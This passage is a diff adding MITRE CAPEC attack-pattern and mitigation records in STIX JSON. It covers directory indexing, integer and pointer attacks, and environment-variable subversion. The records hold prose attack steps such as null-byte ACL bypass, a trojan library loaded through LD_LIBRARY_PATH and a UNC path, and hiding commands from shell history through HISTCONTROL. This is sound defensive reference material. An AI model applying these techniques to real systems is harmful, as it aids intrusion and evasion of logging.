Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.", + "id": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--594c4c5a-1764-41b8-91aa-dc032c6ae92a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. 
Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f114c5f3-cfbd-4300-b255-e4bfeb5672be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.", + "id": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9efb30cd-a0e5-4666-998f-c9119096f678", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "spec_version": "2.1", + 
"target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.", + "id": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2aeb9107-ab93-4c87-b9c5-a7eabd78976b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Host integrity monitoring for critical files, directories, and processes. 
The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.", + "id": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7a2a574-4587-4e1f-83a1-69fa413c6fbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform input validation for all remote content, including remote and user-generated content.", + "id": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a6a7d0d3-2377-4fba-ba62-ba4c605a8206", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.", + "id": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--99e79d18-12bf-4362-a63b-bbc4e4c958a5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use indirect references rather than actual file names.", + "id": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--233f668e-d39a-47dd-8b8e-51d1e88576f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use possible permissions on file access when developing and deploying web applications.", + "id": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-10", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. 
Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.", + "id": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5c7f3e3-935d-41f4-b489-634a196c7864", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. 
This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.", + "external_references": [ + { + "external_id": "CAPEC-127", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/127.html" + }, + { + "external_id": "CWE-424", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-288", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "File and Directory Discovery", + "external_id": "T1083", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1083" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-11", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Directory-Indexing" + } + ], + "id": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Directory Indexing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80\n The target application does not have direct hyperlink to the \"backup\" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a \"db_dump.php\" file in it. This sensitive data should not be disclosed publicly.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Directory Discovery: Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the adversary is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target.

  2. Techniques
    Send requests to the web server for common directory names
    If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers.
    Search for uncommon or potentially user created directories that may be present.

Experiment

  1. Iteratively explore directory/file structures: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

  2. Techniques
    Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes.
    Use a browser to manually explore the website by issuing a request ending the URL in a slash '/'.
    Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
    Sequentially request a list of common base files to each directory discovered.
    Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a \"/\" request

Exploit

  1. Read directories or files which are not intended for public viewing.: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

  2. Techniques
    Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a \"/\" request
    Try other known exploits to elevate privileges sufficient to bypass protected directories.
    List the files in the directory by issuing a request with the URL ending in a \"/\" slash.
    Access the files via direct URL and capture contents.
    Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
    Sequentially request a list of common base files to each directory discovered.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must be misconfigured to return a list of a directory's content when it receives a request that ends in a directory name rather than a file name.", + "The adversary must be able to control the path that is requested of the target.", + "The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.", + "The server version or patch level must not inherently prevent known directory listing attacks from working." + ], + "x_capec_resources_required": [ + "Ability to send HTTP requests to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass the access control of the directory of listings", + "Low": "To issue the request to URL without given a specific file name" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "1. 
Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.", + "id": "course-of-action--e159a65a-59f4-41fb-82a5-0f5cf069b10f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d386aba-01fb-4a86-8b95-a4778cf497ab", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e159a65a-59f4-41fb-82a5-0f5cf069b10f", + "spec_version": "2.1", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "2. 
Preventing with .htaccess in Apache web server: In .htaccess, write \"Options-indexes\".", + "id": "course-of-action--7c00c5ac-d08c-4abb-8ce7-7000072c9d15", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--665bc535-a6b1-48ea-9fd2-4cda3661f872", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c00c5ac-d08c-4abb-8ce7-7000072c9d15", + "spec_version": "2.1", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "3. 
Suppressing error messages: using error 403 \"Forbidden\" message exactly like error 404 \"Not Found\" message.", + "id": "course-of-action--778c2c99-3964-42e2-9e8a-33e9adf9201b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c93af142-fad4-470f-ab94-e6b35f993234", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--778c2c99-3964-42e2-9e8a-33e9adf9201b", + "spec_version": "2.1", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. 
Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", + "external_references": [ + { + "external_id": "CAPEC-128", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + } + ], + "id": "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Integer Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6" + ], + "x_capec_prerequisites": [ + "The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.", + "The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.", + "external_references": [ + { + "external_id": "CAPEC-129", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/129.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-822", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/822.html" + }, + { + "external_id": "CWE-823", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/823.html" + } + ], + "id": "attack-pattern--6295b7e2-98e9-4fc8-acbf-99769cb3cdf0", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Pointer Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target application must have a pointer variable that the attacker can influence to hold an arbitrary value." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-13", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Impair Defenses:Impair Command History Logging", + "external_id": "T1562.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/003" + }, + { + "description": "Hijack Execution Flow:Dynamic Linker Hijacking", + "external_id": "T1574.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/006" + }, + { + "description": "Hijack 
Execution Flow:Path Interception by PATH Environment Variable", + "external_id": "T1574.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/007" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Subverting Environment Variable Values", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80" + ], + "x_capec_child_of_refs": [ + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the adversary upload the Trojan library to a specific location on the target. 
As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\172.16.2.100\\shared_files\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)", + "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on. Most importantly, the adversary tries to determine what environment variables might be used by the underlying software, or even the application itself.

Experiment

  1. Find user-controlled environment variables: Using the information found by probing the application, the adversary attempts to manipulate any user-controlled environment variables they have found are being used by the application, or suspect are being used by the application, and observe the effects of these changes. If the adversary notices any significant changes to the application, they will know that a certain environment variable is important to the application behavior and indicates a possible attack vector.

  2. Techniques
    Alter known environment variables such as \"$PATH\", \"$HOSTNAME\", or \"LD_LIBRARY_PATH\" and see if application behavior changes.

Exploit

  1. Manipulate user-controlled environment variables: The adversary manipulates the found environment variable(s) to abuse the normal flow of processes or to gain access to privileged resources.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e" + ], + "x_capec_prerequisites": [ + "An environment variable is accessible to the user.", + "An environment variable used by the application can be tainted with user supplied data.", + "Input data used in an environment variable is not validated properly.", + "The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an adversary may attempt to manipulate that variable." + ], + "x_capec_skills_required": { + "High": "Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.", + "Low": "In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism." 
